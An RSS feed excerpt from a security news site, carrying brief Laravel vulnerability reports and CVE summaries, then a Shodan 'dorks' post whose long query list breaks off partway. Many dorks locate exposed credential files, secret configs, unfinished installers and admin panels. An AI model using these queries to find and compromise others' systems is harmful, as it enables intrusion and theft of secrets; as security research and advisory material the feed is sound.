<description><![CDATA[A critical security vulnerability has been discovered in LaRecipe, a popular Laravel documentation package with over 2.3 million downloads, that could allow attackers to completely compromise affected servers. The vulnerability, identified as CVE-2025-53833, enables Server-Side Template Injection...]]></description>
<link>https://tsecurity.de/de/2887276/hacking/larecipe-tool-with-23m-downloads-found-vulnerable-to-full-server-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2887276/hacking/larecipe-tool-with-23m-downloads-found-vulnerable-to-full-server-takeover/</guid>
<pubDate>Tue, 15 Jul 2025 13:19:30 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security vulnerability has been discovered in LaRecipe, a popular Laravel documentation package with over 2.3 million downloads, that could allow attackers to completely compromise affected servers. The vulnerability, identified as CVE-2025-53833, enables Server-Side Template Injection (SSTI) attacks that can lead to Remote Code Execution (RCE) on vulnerable systems. Critical Vulnerability Discovered Security researcher […]</p>
<p>The post <a href="https://gbhackers.com/larecipe-tool-with-2-3m-downloads-found-vulnerable-to-full-server-takeover/">LaRecipe Tool with 2.3M Downloads Found Vulnerable to Full Server Takeover</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Over 600 Laravel Apps Exposed to Remote Code Execution Due to Leaked APP_KEYs on GitHub]]></title>
<description><![CDATA[Cybersecurity researchers have discovered a serious security issue that allows leaked Laravel APP_KEYs to be weaponized to gain remote code execution capabilities on hundreds of applications.
"Laravel's APP_KEY, essential for encrypting sensitive data, is often leaked publicly (e.g., on GitHub),"...]]></description>
<link>https://tsecurity.de/de/2882368/it-security-nachrichten/over-600-laravel-apps-exposed-to-remote-code-execution-due-to-leaked-appkeys-on-github/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2882368/it-security-nachrichten/over-600-laravel-apps-exposed-to-remote-code-execution-due-to-leaked-appkeys-on-github/</guid>
<pubDate>Sat, 12 Jul 2025 15:47:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have discovered a serious security issue that allows leaked Laravel APP_KEYs to be weaponized to gain remote code execution capabilities on hundreds of applications.
"Laravel's APP_KEY, essential for encrypting sensitive data, is often leaked publicly (e.g., on GitHub)," GitGuardian said. "If attackers get access to this key, they can exploit a deserialization flaw to]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel APP_KEY Flaw Exploited to Trigger Remote Code Execution on Hundreds of Apps]]></title>
<description><![CDATA[Security researchers have uncovered a critical vulnerability in Laravel applications where exposed APP_KEY credentials are being actively exploited to achieve remote code execution (RCE) on hundreds of production systems. This widespread security flaw stems from Laravel’s automatic deserializatio...]]></description>
<link>https://tsecurity.de/de/2880043/hacking/laravel-appkey-flaw-exploited-to-trigger-remote-code-execution-on-hundreds-of-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2880043/hacking/laravel-appkey-flaw-exploited-to-trigger-remote-code-execution-on-hundreds-of-apps/</guid>
<pubDate>Fri, 11 Jul 2025 09:49:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers have uncovered a critical vulnerability in Laravel applications where exposed APP_KEY credentials are being actively exploited to achieve remote code execution (RCE) on hundreds of production systems. This widespread security flaw stems from Laravel’s automatic deserialization of decrypted data, combined with the framework’s numerous documented gadget chains that enable arbitrary command execution. Critical […]</p>
<p>The post <a href="https://gbhackers.com/laravel-app_key-flaw-exploited/">Laravel APP_KEY Flaw Exploited to Trigger Remote Code Execution on Hundreds of Apps</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-23814 | UniSharp laravel-filemanager Image File upload unrestricted upload (EUVD-2022-0578)]]></title>
<description><![CDATA[A vulnerability was found in UniSharp laravel-filemanager. It has been classified as critical. Affected is the function Upload of the component Image File Handler. The manipulation leads to unrestricted upload.

This vulnerability is traded as CVE-2021-23814. It is possible to launch the attack r...]]></description>
<link>https://tsecurity.de/de/2836532/sicherheitsluecken/cve-2021-23814-unisharp-laravel-filemanager-image-file-upload-unrestricted-upload-euvd-2022-0578/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2836532/sicherheitsluecken/cve-2021-23814-unisharp-laravel-filemanager-image-file-upload-unrestricted-upload-euvd-2022-0578/</guid>
<pubDate>Tue, 17 Jun 2025 16:09:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.unisharp:laravel-filemanager">UniSharp laravel-filemanager</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected is the function <code>Upload</code> of the component <em>Image File Handler</em>. The manipulation leads to unrestricted upload.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.188700">CVE-2021-23814</a>. It is possible to launch the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-49130 | barryvdh laravel-translation-manager up to 0.6.7 cross site scripting (GHSA-j226-63j7-qrqh / EUVD-2025-17461)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in barryvdh laravel-translation-manager up to 0.6.7. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting.

This vulnerability is handled as CVE-2025-49130. The attack may be launc...]]></description>
<link>https://tsecurity.de/de/2821303/sicherheitsluecken/cve-2025-49130-barryvdh-laravel-translation-manager-up-to-067-cross-site-scripting-ghsa-j226-63j7-qrqh-euvd-2025-17461/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2821303/sicherheitsluecken/cve-2025-49130-barryvdh-laravel-translation-manager-up-to-067-cross-site-scripting-ghsa-j226-63j7-qrqh-euvd-2025-17461/</guid>
<pubDate>Mon, 09 Jun 2025 16:36:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.barryvdh:laravel-translation-manager">barryvdh laravel-translation-manager up to 0.6.7</a>. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.311708">CVE-2025-49130</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Laravel Pulse 1.3.1 - Arbitrary Code Injection]]></title>
<description><![CDATA[Laravel Pulse 1.3.1 - Arbitrary Code Injection]]></description>
<link>https://tsecurity.de/de/2820682/poc/webapps-laravel-pulse-131-arbitrary-code-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2820682/poc/webapps-laravel-pulse-131-arbitrary-code-injection/</guid>
<pubDate>Mon, 09 Jun 2025 06:52:50 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel Pulse 1.3.1 - Arbitrary Code Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-48490 | Lomkit laravel-rest-api up to 2.12.x improper authorization (GHSA-69rh-hccr-cxrj)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Lomkit laravel-rest-api up to 2.12.x. Affected is an unknown function. The manipulation leads to improper authorization.

This vulnerability is traded as CVE-2025-48490. It is possible to launch the attack remotely. There is no explo...]]></description>
<link>https://tsecurity.de/de/2806216/sicherheitsluecken/cve-2025-48490-lomkit-laravel-rest-api-up-to-212x-improper-authorization-ghsa-69rh-hccr-cxrj/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2806216/sicherheitsluecken/cve-2025-48490-lomkit-laravel-rest-api-up-to-212x-improper-authorization-ghsa-69rh-hccr-cxrj/</guid>
<pubDate>Fri, 30 May 2025 12:07:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.lomkit:laravel-rest-api">Lomkit laravel-rest-api up to 2.12.x</a>. Affected is an unknown function. The manipulation leads to improper authorization.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.310620">CVE-2025-48490</a>. It is possible to launch the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-26159 | Laravel Starter 11.11.0 Tags Name cross site scripting (EUVD-2025-12260)]]></title>
<description><![CDATA[A vulnerability was found in Laravel Starter 11.11.0. It has been classified as problematic. This affects an unknown part of the component Tags Handler. The manipulation of the argument Name leads to cross site scripting.

This vulnerability is uniquely identified as CVE-2025-26159. It is possibl...]]></description>
<link>https://tsecurity.de/de/2796211/sicherheitsluecken/cve-2025-26159-laravel-starter-11110-tags-name-cross-site-scripting-euvd-2025-12260/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2796211/sicherheitsluecken/cve-2025-26159-laravel-starter-11110-tags-name-cross-site-scripting-euvd-2025-12260/</guid>
<pubDate>Sun, 25 May 2025 07:08:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel:starter">Laravel Starter 11.11.0</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This affects an unknown part of the component <em>Tags Handler</em>. The manipulation of the argument <em>Name</em> leads to cross site scripting.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.305961">CVE-2025-26159</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Shodan-Dorks - Dorks for Shodan; a powerful tool used to search for Internet-connected devices]]></title>
<description><![CDATA[This GitHub repository provides a range of search queries, known as "dorks," for Shodan, a powerful tool used to search for Internet-connected devices. The dorks are designed to help security researchers discover potential vulnerabilities and configuration issues in various types of devices such ...]]></description>
<link>https://tsecurity.de/de/2769397/it-security-tools/shodan-dorks-dorks-for-shodan-a-powerful-tool-used-to-search-for-internet-connected-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2769397/it-security-tools/shodan-dorks-dorks-for-shodan-a-powerful-tool-used-to-search-for-internet-connected-devices/</guid>
<pubDate>Sun, 11 May 2025 15:33:40 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_CyaABeyGjA0Ll_8pZtRLfDgAp-WXQ_Ds-AMmavEo0GqpCzF1LlqyvutvjapUNIVeCL7WY2f8eXU67JktzZ5jecdY14eWUvMXfYCTQdwHU8Pl-DFb41HL1nrVr8YCsh6UYjSY6TJH7jXLdoGQ2QdE4ZY734fzyJzrfWEI1pSc81Qv0OpdITrVRpEgYJU"><img alt="" data-original-height="662" data-original-width="1183" height="358" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_CyaABeyGjA0Ll_8pZtRLfDgAp-WXQ_Ds-AMmavEo0GqpCzF1LlqyvutvjapUNIVeCL7WY2f8eXU67JktzZ5jecdY14eWUvMXfYCTQdwHU8Pl-DFb41HL1nrVr8YCsh6UYjSY6TJH7jXLdoGQ2QdE4ZY734fzyJzrfWEI1pSc81Qv0OpdITrVRpEgYJU=w640-h358" width="640"></a></div><br> <p>This GitHub repository provides a range of search queries, known as "dorks," for Shodan, a powerful tool used to search for Internet-connected devices. The dorks are designed to help security researchers discover potential <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> and <a href="https://www.kitploit.com/search/label/Configuration" target="_blank" title="configuration">configuration</a> issues in various types of devices such as webcams, routers, and servers. This resource is helpful for those interested in exploring network security and conducting <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> scanning, including both beginners and experienced information security professionals. By leveraging this repository, users can improve the security of their own networks and protect against potential attacks.</p> <span><a name="more"></a></span><p><br></p><h3> Shodan Dorks: </h3> <pre><code><br>aa3939fc357723135870d5036b12a67097b03309<br>app="HIKVISION-综合安防管理平台"<br>"AppleHttpServer"<br>"AutobahnPython"<br>basic realm="Kettle"<br>Bullwark<br>cassandra<br>Chromecast<br>"ClickShareSession"<br>"/config/log_off_page.htm"<br>'"connection: upgrade"'<br>"cowboy"<br>cpe:"cpe:2.3:a:apache:cassandra"<br>cpe:"cpe:2.3:a:backdropcms:backdrop"<br>cpe:"cpe:2.3:a:bolt:bolt"<br>cpe:"cpe:2.3:a:cisco:sd-wan"<br>cpe:"cpe:2.3:a:ckeditor:ckeditor"<br>cpe:"cpe:2.3:a:cmsimple:cmsimple"<br>cpe:"cpe:2.3:a:djangoproject:django"<br>cpe:"cpe:2.3:a:djangoproject:django" || http.title:"Django administration"<br>cpe:"cpe:2.3:a:eclipse:jetty"<br>cpe:"cpe:2.3:a:embedthis:appweb"<br>cpe:"cpe:2.3:a:embedthis:goahead"<br>cpe:"cpe:2.3:a:exim:exim"<br>cpe:"cpe:2.3:a:gitlist:gitlist"<br>cpe:"cpe:2.3:a:google:web_server"<br>cpe:"cpe:2.3:a:jfrog:artifactory"<br>cpe:"cpe:2.3:a:kentico:kentico"<br>cpe:"cpe:2.3:a:koha:koha"<br>cpe:"cpe:2.3:a:konghq:docker-kong"<br>cpe:"cpe:2.3:a:laurent_destailleur:awstats"<br>cpe:"cpe:2.3:a:lighttpd:lighttpd"<br>cpe:"cpe:2.3:a:microsoft:internet_information_server"<br>cpe:"cpe:2.3:a:modx:modx_revolution"<br>cpe:"cpe:2.3:a:nodebb:nodebb"<br>cpe:"cpe:2.3:a:nodejs:node.js"<br>cpe:"cpe:2.3:a:openvpn:openvpn_access_server"<br>cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"<br>cpe:"cpe:2.3:a:oracle:glassfish_server"<br>cpe:"cpe:2.3:a:oracle:iplanet_web_server"<br>cpe:"cpe:2.3:a:php:php"<br>cpe:"cpe:2.3:a:prestashop:prestashop"<br>cpe:"cpe:2.3:a:proftpd:proftpd"<br>cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems"<br>cpe:"cpe:2.3:a:pulsesecure:pulse_connect_secure"<br>cpe:"cpe:2.3:a:rubyonrails:rails"<br>cpe:"cpe:2.3:a:sensiolabs:symfony"<br>cpe:"cpe:2.3:a:typo3:typo3"<br>cpe:"cpe:2.3:a:vmware:rabbitmq"<br>cpe:"cpe:2.3:a:webedition:webedition_cms"<br>cpe:"cpe:2.3:a:zend:zend_server"<br>cpe:"cpe:2.3:h:zte:f460"<br>cpe:"cpe:2.3:o:canonical:ubuntu_linux"<br>cpe:"cpe:2.3:o:fedoraproject:fedora"<br>cpe:"cpe:2.3:o:microsoft:windows"<br>"DIR-845L"<br>eBridge_JSessionid<br>'ecology_JSessionid'<br>ecology_JSessionid<br>elastic indices<br>"ElasticSearch"<br>ESMTP<br>/geoserver/<br>Graylog<br>'hash:1357418825'<br>html:"access_tokens.db"<br>html:"ACE 4710 Device Manager"<br>html:"ActiveCollab Installer"<br>html:"Administration - Installation - MantisBT"<br>html:"Satis"<br>html:"Akeeba Backup"<br>html:"Amazon EC2 Status"<br>html:"anonymous-cli-metrics.json"<br>html:"ANTEEO"<br>html:"anyproxy"<br>html:"Apache Tomcat"<br>html:"Apdisk"<br>html:"appveyor.yml"<br>html:"aquatronica"<br>html:"Argo CD"<br>html:"Ariang"<br>html:"ASPNETCORE_ENVIRONMENT"<br>html:"atlassian-connect.json"<br>html:"atomcms"<br>html:"auth.json"<br>html:"authorization token is empty"<br>html:"Avaya Aura"<br>html:"AVideo"<br>html:"AWS EC2 Auto Scaling Lab"<br>html:"azure-pipelines.yml"<br>html:"babel.config.js"<br>html:"behat.yml"<br>html:"BeyondTrust"<br>html:"BIG-IP APM"<br>html:"BIG-IP Configuration Utility"<br>html:"bitbucket-pipelines.yml"<br>"html:\"/bitrix/\""<br>html:"blazor.boot.json"<br>html:"Blesta installer"<br>html:"blob.core.windows.net"<br>html:"buildAssetsDir" "nuxt"<br>html:"Calibre"<br>html:"camaleon_cms"<br>html:"Cargo.lock"<br>html:"Cargo.toml"<br>html:"CasaOS"<br>html:"Cassia Bluetooth Gateway Management Platform"<br>html:"/certenroll"<br>html:"/cfadmin/img/"<br>html:"Change Detection"<br>html:"Cisco Expressway"<br>html:"cisco firepower management"<br>html:"Cisco Unity Connection"<br>html:"/citrix/xenapp"<br>html:"ckan 2.8.2" || html:"ckan 2.3"<br>html:"cloud-config.yml"<br>html:"CMS Made Simple Install/Upgrade"<br>html:"codeception.yml"<br>html:"CodeMeter"<br>html:"CodiMD"<br>html:"config.rb"<br>html:"config.ru"<br>html:'content="eArcu'<br>html:"content="Navidrome""<br>html:"ContentPanel SetupWizard"<br>html:"contexts known to this"<br>html:"Coolify" html:"register"<br>html:"Couchbase Sync Gateway"<br>html:"Cox Business"<br>html:"credentials.db"<br>html:"Crontab UI"<br>html:"CrushFTP"<br>html:"cyberpanel"<br>html:"CyberPanel"<br>html:"DashRenderer"<br>html:"Dataease"<br>html:"data-xwiki-reference"<br>"html=\"Decision Center Enterprise console\""<br>html:"Decision Center Enterprise console"<br>html:"DefectDojo Logo"<br>html:"def_wirelesspassword"<br>html:"Dell OpenManage Switch Administrator"<br>'html:"desktop.ini"'<br>html:"DSR-250"<br>html:"DXR.axd"<br>html:"Easy Installer by ViserLab"<br>html:"editorconfig"<br>html:"EJBCA Enterprise Cloud Configuration Wizard"<br>html:"engage - Portail soignant"<br>html:"epihash"<br>html:"eShop Installer"<br>html:"ETL3100"<br>html:"FacturaScripts installer"<br>html:"faradayApp"<br>html:"Femtocell Access Point"<br>html:"FileCatalyst file transfer solution"<br>html:"FleetCart"<br>html:"FleetCart - Installation"<br>html:"Forgejo"<br>html:"FortiPortal"<br>html:"F-Secure Policy Manager"<br>html:ftpconfig<br>html:"ganglia_form.submit()"<br>html:"Generated by The Webalizer"<br>html:"GeniusOcean Installer"<br>html:"gitlab-ci.yml"<br>html:"GitLab Enterprise Edition"<br>html:"git web interface version"<br>html:"go.mod"<br>html:"gradio_mode"<br>html:"Guardfile"<br>html:"HAL Management Console"<br>html:"hgignore"<br>html:"Home - CUPS"<br>html:"HomeWorks Illumination Web Keypad"<br>html:"Honeywell Building Control"<br>html:"https://hugegraph.github.io"<br>html:"human.aspx"<br>html:"ibmdojo"<br>html:"iClock Automatic"<br>html:"IDP Skills Installer"<br>html:"imgproxy"<br>html:"Installation" html:"itop"<br>html:"Installation Panel"<br>html:"Installer - GROWI"<br>html:"Install Flarum"<br>html:"Install - StackPosts"<br>html:"Install the script - JustFans"<br>html:"instance_metadata"<br>html:"Invicti Enterprise - Installation Wizard"<br>html:"Invoice Ninja Setup"<br>html:"JBossWS"<br>html:"JK Status Manager"<br>html:"jsconfig.json"<br>html:"jwks.json"<br>html:"karma.conf.js"<br>html:"Kemp Login Screen"<br>html:"LANCOM Systems GmbH"<br>html:"Laragon" html:"phpinfo"<br>html:"lesshst"<br>html:"LibreNMS Install"<br>html:"Limesurvey Installer"<br>html:"LMSZAI - Learning Management System"<br>html:"LoadMaster"<br>html:"Locklizard Web Viewer"<br>html:"Login - Jorani"<br>html:"Login - Netflow Analyzer"<br>html:"Login | Splunk"<br>html:"Logon Error Message"<br>html:"logstash"<br>"html:\"Lucee\""<br>html:"Lychee-installer"<br>html:"Magento Installation"<br>html:"Magnolia is a registered trademark"<br>html:mailmap<br>html:"manifest.json"<br>html:"MasterSAM"<br>html:"Mautic Installation"<br>html:"mempool-space" || title:"Signet Explorer"<br>html:"Mercurial repositories index"<br>html:"mongod"<br>html:"mooSocial Installation"<br>html:"mysql_history"<br>html:"/_next/static"<br>html:"NGINX+ Dashboard"<br>html:"Nginx Proxy Manager"<br>html:"nginxWebUI"<br>html:"ng-version="<br>html:"nopCommerce Installation"<br>html:"npm-debug.log"<br>html:"npm-shrinkwrap.json"<br>html:"Ocp-Apim-Subscription-Key"<br>html:"omniapp"<br>html:"onedev.io"<br>html:"Open Journal Systems"<br>html:"Orbit Telephone System"<br>html:"Orchard Setup - Get Started"<br>html:"osCommerce"<br>html:"OWA CONFIG SETTINGS"<br>html:"owncast"<br>html:"packages.config"<br>html:"parameters.yml"<br>html:"PDI Intellifuel"<br>html:"phinx.yml"<br>html:"php_cs.cache"<br>html:"phpcs.xml"<br>html:"phpdebugbar"<br>html:"/phpgedview.db"<br>html:"phpipam installation wizard"<br>html:"phpIPAM IP address management"<br>html:"PHPJabbers"<br>html:"phpLDAPadmin"<br>html:"phplist"<br>html:"phpspec.yml"<br>html:"phpstan.neon"<br>html:"phpSysInfo"<br>html:"pipeline.yaml"<br>html:"Pipfile"<br>html:"Piwigo" html:"- Installation"<br>html:"Plausible"<br>html:"pnpm-lock.yaml"<br>html:"polyfill.io"<br>html:"Portal Setup"<br>html:"PowerChute Network Shutdown"<br>html:"Powered by Gitea"<br>"html:\"PowerShell Universal\""<br>html:"private gpt"<br>html:"Procfile"<br>html:"/productsalert"<br>html:"ProfitTrailer Setup"<br>html:"ProjectSend"<br>html:"ProjectSend setup"<br>html:"protractor.conf.js"<br>html:"Provide a link that opens Word"<br>html:"psalm.xml"<br>html:"pubspec.yaml"<br>html:"pyload"<br>html:"pypiserver"<br>html:"pyproject.toml"<br>html:"python_gc_objects_collected_total"<br>html:"QuickCMS Installation"<br>html:"QVidium Management"<br>html:"radarr"<br>html:"RaidenMAILD"<br>html:"Rakefile"<br>html:"readarr"<br>html:"README.MD"<br>html:"Redash Initial Setup"<br>html:"redis.conf"<br>html:"redis.exceptions.ConnectionError"<br>html:"request-baskets"<br>html:"rollup.config.js"<br>html:"rubocop.yml"<br>html:"SABnzbd Quick-Start Wizard"<br>html:"Safeguard for Privileged Passwords"<br>html:"Saia PCD Web Server"<br>html:"Salia PLCC"<br>html:"SAP"<br>html:"sass-lint.yml"<br>html:"scrutinizer.yml"<br>html:"SDT-CW3B1"<br>html:"searchreplacedb2.php"<br>html:'Select a frequency for snapshot retention'<br>html:"sendgrid.env"<br>html:"Sentinel License Monitor"<br>html:"server_databases.php"<br>html:"Serv-U"<br>html:settings.py<br>html:"Setup GLPI"<br>html:"Setup - jfa-go"<br>html:"sftp.json"<br>html:"shopping cart program by zen cart"<br>html:"SimpleHelp"<br>html:"Sitecore"<br>html:"Snipe-IT Setup"<br>html:"sonarr"<br>html:"Sorry, the requested URL"<br>html:"stackposts"<br>html:"Struts Problem Report"<br>html:"Symmetricom SyncServer"<br>html:"thisIDRACText"<br>html:"Tiny File Manager"<br>html:"Admin Console"<br>html:"title=\"blue yonder\""<br>html:'title="Lucy'<br>html:"PDNU"<br>html:"prowlarr"<br>html:"Stash"<br>html:"Webinterface"<br>html:"tox.ini"<br>html:"Traccar"<br>html:"travis.yml"<br>"html:\"Trilium Notes\""<br>html:"TurboMeeting"<br>html:"/tvcmsblog"<br>html:"Twig Runtime Error"<br>html:'Twisted' html:"python"<br>html:"Ubersmith Setup"<br>html:"UEditor"<br>html:"UPS Network Management Card 4"<br>html:"UrBackup - Keeps your data safe"<br>html:"/userRpm/"<br>html:"utnserver Control Center"<br>html:"UVDesk Helpdesk Community Edition - Installation Wizard"<br>html:"uwsgi.ini"<br>html:"Vagrantfile"<br>html:"Veeam Backup"<br>html:"Veritas NetBackup OpsCenter Analytics"<br>html:"Versa Networks"<br>html:"Viminfo"<br>html:"VinChin"<br>html:"Virtual SmartZone"<br>html:"vite.config.js"<br>html:"vmw_nsx_logo-black-triangle-500w.png"<br>html:"voyager-assets"<br>html:"/vsaas/v2/static/"<br>html:"/waroot/style.css"<br>html:"webpack.config.js"<br>html:"webpackJsonpzipkin-lens"<br>html:"webpack.mix.js"<br>"html:\"welcome.cgi?p=logo\""<br>html:"Welcome to CakePHP"<br>html:"Welcome to Espocrm"<br>html:"Welcome to Express"<br>html:"Welcome to Nginx"<br>html:"Welcome to Openfire Setup"<br>html:"Welcome to Progress Application Server for OpenEdge"<br>html:"Welcome to the Ruckus"<br>html:"Welcome to Vtiger CRM"<br>html:"Welcome to your Strapi app"<br>html:"Welcome to your Strapi app" html:"create an administrator"<br>html:"Werkzeug powered traceback interpreter"<br>html:".wget-hsts"<br>html:".wgetrc"<br>html:"WhatsUp Gold"<br>html:"Whisparr"<br>html:"Whitelabel Error Page"<br>html:"window.nps"<br>html:"WN530HG4"<br>html:"WN531G3"<br>html:"WN533A8"<br>html:"wpad.dat"<br>html:"wp-cli.yml"<br>html:"/wp-content/plugins/flexmls-idx"<br>html:"/wp-content/plugins/learnpress"<br>html:"/wp-content/plugins/really-simple-ssl"<br>html:"/wp-content/plugins/tutor/"<br>html:"Writebook"<br>html:"XBackBone Installer"<br>html:"/xipblog"<br>html:XploitSPY<br>html:"yii\base\ErrorException"<br>html:"Your Azure Function App is up and running"<br>html:"Zebra Technologies"<br>html:"zzcms"<br>html:"ZzzCMS"<br>'HTTP/1.0 401 Please Authenticate\r\nWWW-Authenticate: Basic realm="Please Login"'<br>http.component:"Adobe ColdFusion"<br>http.component:"Adobe Experience Manager"<br>http.component:"atlassian confluence"<br>http.component:"Atlassian Confluence"<br>http.component:"atlassian jira"<br>http.component:"Atlassian Jira"<br>http.component:"Bitbucket"<br>http.component:"BitBucket"<br>http.component:"drupal"<br>http.component:"Drupal"<br>http.component:"Dynamicweb"<br>http.component:"ghost"<br>http.component:"Joomla"<br>http.component:"magento"<br>http.component:"Magento"<br>http.component:"October CMS"<br>"http.component:\"prestashop\""<br>http.component:"prestashop"<br>http.component:"Prestashop"<br>http.component:"PrestaShop"<br>http.component:"RoundCube"<br>http.component:"Subrion"<br>http.component:"TeamCity"<br>http.component:"TYPO3"<br>http.component:"vBulletin"<br>http.component:zk http.title:"Server Backup Manager"<br>http.favicon.hash:-1005691603<br>http.favicon.hash:1011076161<br>http.favicon.hash:-1013024216<br>http.favicon.hash:1017650009<br>http.favicon.hash:1052926265<br>http.favicon.hash:106844876<br>http.favicon.hash:-1074357885<br>http.favicon.hash:1090061843<br>http.favicon.hash:1099097618<br>http.favicon.hash:1099370896<br>http.favicon.hash:-1101206929<br>http.favicon.hash:"-1105083093"<br>http.favicon.hash:-1117549627<br>http.favicon.hash:-1127895693<br>http.favicon.hash:"-1148190371"<br>http.favicon.hash:115295460<br>http.favicon.hash:116323821<br>http.favicon.hash:11794165<br>http.favicon.hash:-1197926023<br>http.favicon.hash:1198579728<br>http.favicon.hash:1199592666<br>http.favicon.hash:1212523028<br>http.favicon.hash:-1215318992<br>"http.favicon.hash:-121681558"<br>http.favicon.hash:-121681558<br>http.favicon.hash:"-1217039701"<br>http.favicon.hash:-1224668706<br>http.favicon.hash:-1247684400<br>http.favicon.hash:1249285083<br>http.favicon.hash:-1250474341<br>http.favicon.hash:-1258058404<br>http.favicon.hash:-1261322577<br>http.favicon.hash:1262005940<br>http.favicon.hash:-1264095219<br>http.favicon.hash:-1292923998,-1166125415<br>http.favicon.hash:-1295577382<br>http.favicon.hash:-1298131932<br>http.favicon.hash:-130447705<br>http.favicon.hash:1337147129<br>"http.favicon.hash:-1341442175"<br>http.favicon.hash:-1343712810<br>http.favicon.hash:-1350437236<br>http.favicon.hash:1354079303<br>http.favicon.hash:1357234275<br>http.favicon.hash:-1373456171<br>http.favicon.hash:-1379982221<br>http.favicon.hash:"1380908726"<br>http.favicon.hash:1380908726<br>http.favicon.hash:-1381126564<br>http.favicon.hash:-1383463717<br>http.favicon.hash:1386054408<br>http.favicon.hash:1398055326<br>http.favicon.hash:1410071322<br>http.favicon.hash:-1414548363<br>http.favicon.hash:-1416464161<br>http.favicon.hash:1460499495<br>http.favicon.hash:1464851260<br>http.favicon.hash:-1465760059<br>http.favicon.hash:-1478287554<br>http.favicon.hash:-1495233116<br>http.favicon.hash:-1496590341<br>http.favicon.hash:1499876150<br>http.favicon.hash:-1499940355<br>http.favicon.hash:-1529860313<br>http.favicon.hash:1540720428<br>http.favicon.hash:-1548359600<br>http.favicon.hash:1550906681<br>http.favicon.hash:1552322396<br>http.favicon.hash:-1575154882<br>http.favicon.hash:-1595726841<br>http.favicon.hash:1604363273<br>http.favicon.hash:1606029165<br>http.favicon.hash:-1606065523<br>http.favicon.hash:-1649949475<br>http.favicon.hash:1653394551<br>http.favicon.hash:-1653412201<br>http.favicon.hash:"-165631681"<br>http.favicon.hash:-1663319756<br>http.favicon.hash:-1680052984<br>http.favicon.hash:1691956220<br>http.favicon.hash:1693580324<br>http.favicon.hash:"-1706783005"<br>http.favicon.hash:-1706783005<br>http.favicon.hash:1749354953<br>http.favicon.hash:176427349<br>http.favicon.hash:-178113786<br>http.favicon.hash:1781653957<br>http.favicon.hash:-1797138069<br>http.favicon.hash:1817615343<br>http.favicon.hash:1828614783<br>http.favicon.hash:"-1830859634"<br>http.favicon.hash:-186961397<br>http.favicon.hash:-1893514038<br>http.favicon.hash:1895809524<br>http.favicon.hash:-1898583197<br>http.favicon.hash:1903390397<br>http.favicon.hash:-1950415971<br>http.favicon.hash:-1951475503<br>http.favicon.hash:1952289652<br>http.favicon.hash:-1961736892<br>http.favicon.hash:-1970367401<br>http.favicon.hash:-2017596142<br>http.favicon.hash:-2017604252<br>http.favicon.hash:2019488876<br>http.favicon.hash:-2028554187<br>http.favicon.hash:-2032163853<br>http.favicon.hash:-2051052918<br>